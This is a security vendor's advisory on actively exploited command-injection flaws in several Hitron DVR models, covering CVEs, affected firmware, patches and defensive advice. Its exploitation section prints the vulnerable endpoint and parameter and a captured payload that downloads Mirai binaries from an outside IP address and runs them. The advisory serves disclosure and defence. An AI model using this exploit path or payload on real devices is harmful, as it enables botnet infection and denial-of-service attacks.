Actively Exploited Vulnerability in Hitron DVRs: Fixed, Patches Available
Executive summary
The Akamai Security Intelligence Response Team (SIRT) has issued an additional update to the InfectedSlurs advisory series since one of the affected vendors has released patches and guidance.
The vulnerability within Hitron was identified in the wild and has been given the following CVE IDs:
CVE-2024-22768 — A CVSS v3.1 base score of 7.4 has been calculated; the CVSS vector string is (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H).
CVE-2024-22769 — A CVSS v3.1 base score of 7.4 has been calculated; the CVSS vector string is (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H).
CVE-2024-22770 — A CVSS v3.1 base score of 7.4 has been calculated; the CVSS vector string is (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H).
CVE-2024-22771 — A CVSS v3.1 base score of 7.4 has been calculated; the CVSS vector string is (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H).
CVE-2024-22772 — A CVSS v3.1 base score of 7.4 has been calculated; the CVSS vector string is (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H).
CVE-2024-23842 — A CVSS v3.1 base score of 7.4 has been calculated; the CVSS vector string is (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H).
The malicious payloads captured in the wild install a Mirai-based malware to create a distributed denial-of-service (DDoS) botnet.
We provided an extensive list of indicators of compromise (IOCs), Snort rules, and YARA rules in the original research to help identify these exploit attempts in the wild and to help uncover possible active infections on defender networks.
Need to know
As part of the InfectedSlurs discovery, the Akamai SIRT uncovered vulnerabilities in multiple Hitron DVR device models that are actively exploited in the wild. Hitron devices are manufactured in South Korea by Hitron Systems.
The vulnerability allows an authenticated attacker to achieve OS command injection with a payload delivered via a POST request to the management interface. In its current configuration, it is utilizing device default credentials in the captured payloads.
The impacted devices and firmware versions are:
DVR HVR-4781: versions 1.03 through 4.02
DVR HVR-8781: versions 1.03 through 4.02
DVR HVR-16781: versions 1.03 through 4.02
DVR LGUVR-4H: versions 1.02 through 4.02
DVR LGUVR-8H: versions 1.02 through 4.02
DVR LGUVR-16H: versions 1.02 through 4.02
The vendor (Hitron Systems) has released new firmware versions to address the vulnerabilities. The vendor suggests upgrading to firmware version ≥ 4.03 for all impacted models as soon as possible. Advisories have also been published by CISA and KISA. KISA has also released advisories related to the individual CVEs, which can be found at the following links:
Exploitation observed
In late October 2023, Akamai SIRT analysts noticed a surge in activity to our honeypots that targeted a rarely abused TCP port. The probes were of low frequency and appeared to first attempt an authentication via a POST request to /cgi-bin/system_ntp.cgi (Figure 1) followed by a command injection exploitation attempt (Figure 2). The devices targeted are Hitron Systems DVR devices that are vulnerable to RCE via command injection (Figure 3). Once authenticated, the attacker targets the command injection vulnerability in the timeserver parameter via a POST request to /cgi-bin/system_ntp.cgi.
URL: /cgi-bin/system_ntp.cgi
POST BODY:
enc=11&ip=[targeted IP]&username=[REDACTED]&password=[REDACTED]
Fig. 1: Authentication attempt
URL: /cgi-bin/system_ntp.cgi
POST BODY:
lang=ja&useNTPServer=1&synccheck=1&public=0×erver=[RCE
PAYLOAD]&interval=60&enableNTPServer=1
Fig. 2: Exploitation attempt
curl+http://45.142.182.96/spl/mips+-O;+chmod+777+mips;+./mips+kdvr;curl+http://45.142.182.96/spl/x86+-O;+chmod+777+x86;+./x86+kdvr;curl+http://45.142.182.96/spl/mpsl+-O;+chmod+777+mpsl;+./mpsl+kdvr;curl+http://45.142.182.96/spl/arm+-O;+chmod+777+arm;+./arm+kdvr;curl+http://45.142.182.96/spl/arm5+-O;+chmod+777+arm5;+./arm5+kdvr;curl+http://45.142.182.96/spl/arm6+-O;+chmod+777+arm6;+./arm6+kdvr;curl+http/45.142.182.96/spl/arm7+-O;+chmod+777+arm7;+./arm7+kdvr
Fig. 3: Captured RCE payload
Protection
Hitron DVR users who are running devices that are impacted by this vulnerability should immediately upgrade to the latest available firmware versions (≥ 4.03) that fix the RCE vulnerability.
HVR-4781: version 4.03
HVR-8781: version 4.03
HVR-16781: version 4.03
LGUVR-4H: version 4.03
LGUVR-8H: version 4.03
LGUVR-16H: version 4.03
Additionally, to protect against this and future threats, several security measures should be implemented. First, organizations and individuals using the affected devices should change default login credentials immediately to enhance security. Regular monitoring of network traffic and logs can aid in the early detection of suspicious activity. Timely installation of security patches and updates from the device manufacturer is crucial to address the identified vulnerability.
Collaboration with security researchers, threat intelligence providers, and industry peers can help you stay informed about emerging threats and vulnerabilities. Finally, maintaining an updated inventory of connected devices and implementing network segmentation can limit the potential impact of such attacks.
Conclusion
Addressing the security issues identified in the Hitron systems and associated devices requires a multifaceted approach, combining user awareness, prompt patching, proactive monitoring, and collaboration within the cybersecurity community. By taking these measures, organizations and individuals can significantly reduce the risks posed by the observed malicious activity.
Stay tuned
To keep up with threats and other findings by the SIRT and other Akamai security research groups, follow us on X (formerly Twitter) or check out our SIG hub.
The Akamai SIRT would like to thank the folks at CISA, US-CERT, and KISA for their assistance in reporting these vulnerabilities to the vendors.
